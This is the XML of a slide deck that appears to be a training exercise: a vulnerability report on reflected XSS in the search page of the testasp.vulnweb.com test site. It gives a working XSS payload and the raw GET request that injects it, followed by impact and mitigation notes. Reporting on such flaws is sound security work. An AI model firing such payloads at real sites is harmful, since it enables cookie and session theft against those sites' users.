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sldIdLst>
    <p:sldId id="261" r:id="rId2"/>
    <p:sldId id="266" r:id="rId3"/>
    <p:sldId id="268" r:id="rId4"/>
    <p:sldId id="269" r:id="rId5"/>
    <p:sldId id="270" r:id="rId6"/>
    <p:sldId id="271" r:id="rId7"/>
    <p:sldId id="273"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65F68F7-50E9-4D77-BFF7-E79FD5F255EB}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>23-02-2022</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FF7A857-3860-4DD0-AC91-239A15E9257A}"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73243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F68F7-50E9-4D77-BFF7-E79FD5F255EB}"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F7A857-3860-4DD0-AC91-239A15E9257A}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260608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F68F7-50E9-4D77-BFF7-E79FD5F255EB}"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F7A857-3860-4DD0-AC91-239A15E9257A}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45070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F68F7-50E9-4D77-BFF7-E79FD5F255EB}"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F7A857-3860-4DD0-AC91-239A15E9257A}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145817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65F68F7-50E9-4D77-BFF7-E79FD5F255EB}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>23-02-2022</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FF7A857-3860-4DD0-AC91-239A15E9257A}"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022276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5F68F7-50E9-4D77-BFF7-E79FD5F255EB}"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F7A857-3860-4DD0-AC91-239A15E9257A}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174680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5F68F7-50E9-4D77-BFF7-E79FD5F255EB}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>23-02-2022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F7A857-3860-4DD0-AC91-239A15E9257A}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367649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5F68F7-50E9-4D77-BFF7-E79FD5F255EB}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>23-02-2022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F7A857-3860-4DD0-AC91-239A15E9257A}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70076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F68F7-50E9-4D77-BFF7-E79FD5F255EB}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>23-02-2022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F7A857-3860-4DD0-AC91-239A15E9257A}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180103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65F68F7-50E9-4D77-BFF7-E79FD5F255EB}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>23-02-2022</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FF7A857-3860-4DD0-AC91-239A15E9257A}"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321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65F68F7-50E9-4D77-BFF7-E79FD5F255EB}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>23-02-2022</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FF7A857-3860-4DD0-AC91-239A15E9257A}"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451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65F68F7-50E9-4D77-BFF7-E79FD5F255EB}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>23-02-2022</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FF7A857-3860-4DD0-AC91-239A15E9257A}"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5302777"/>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75A4-25F8-4242-93B2-A09FE9AB4919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664116" y="1779489"/>
            <a:ext cx="8361229" cy="2098226"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" dirty="0"/>
              <a:t>Task 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198827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BCC97-BF3D-4DE8-B3D8-A483652C6C54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878541" y="259976"/>
            <a:ext cx="11116235" cy="6445624"/>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endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>REPORT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Name of the Vulnerability : Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Date                                    : 23-02-2022</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Domain                               : vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Subdomain                         : testasp.vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Steps to reproduce             : To reproduce this an attacker has to :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>			    1) Devise a malicious XSS code to exploit the site. For POC purposes I have 			        used the following payload to demonstrate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&lt;form onafterscriptexecute=alert(document.domain)&gt;&lt;script&gt;1&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>			    2)The code is properly injected on the search bar and this vulnerable 			        parameter will then create the GET request that will inject the payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>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18444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BCC97-BF3D-4DE8-B3D8-A483652C6C54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878541" y="259976"/>
            <a:ext cx="11116235" cy="6445624"/>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IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PAYLOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>GET /Search.asp?tfSearch=%3cform%20onafterscriptexecute%3dalert(document%2edomain)%3e%3cscript%3e1%3c%2fscript%3e HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Host: testasp.vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Accept-Language: en-US,en;q=0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Accept-Encoding: gzip, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Connection: close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Referer: http://testasp.vulnweb.com/Search.asp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Cookie: ASPSESSIONIDAQQDRARD=LOFEPOOCDCDCDLEEIGGPBCJG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Upgrade-Insecure-Requests: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237936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BCC97-BF3D-4DE8-B3D8-A483652C6C54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878541" y="259976"/>
            <a:ext cx="11116235" cy="6445624"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Impact                                 :   This XSS payload vulnerability can allow the attacker can steal cookies 			      and Sessions. It can give the attacker access to other client’s 			                    computers. Also allow modification of the user’s data and redirect the 			      user websites. This could affect the credentiality of our website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Mitigation                            :   Sanitizing user Input is one way of solving this. Though sanitizing is a 			      robust defence, it could be combined with validating the input to bring 			      good result regarding this issue.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4663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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BDE6DB0-3DBC-4E4E-825E-1939AAB9FE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494"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1613646" y="604142"/>
            <a:ext cx="10221695" cy="6101458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC3E5CBC-F492-49D1-86E1-CBE658455F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842682" y="152400"/>
            <a:ext cx="1625958" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Request POC  :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58525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BCC97-BF3D-4DE8-B3D8-A483652C6C54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1559859" y="655028"/>
            <a:ext cx="10434916" cy="6050571"/>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endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C94E4540-18C1-42B3-8DB9-25A74848F8EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="4494"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1559859" y="655029"/>
            <a:ext cx="10434916" cy="6050570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190347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CA3A62-6737-45A4-B880-A8D329E46377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="242047"/>
            <a:ext cx="2693366" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Injection Demonstration : </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Content Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB404A02-BF9B-4312-834D-C7C68710DD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2354" y="788894"/>
            <a:ext cx="9008633" cy="5836024"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2139979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implescreenrecorder-2022-02-23_05.30.17_Trim">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A6C5E8-9265-48B4-B27D-8756C8A4CC5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012141" y="756397"/>
            <a:ext cx="8803901" cy="5502438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BD40182-EBF1-48D4-A710-F8A041E0F8A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815789" y="275999"/>
            <a:ext cx="4249881" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Video Demonstration  :                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
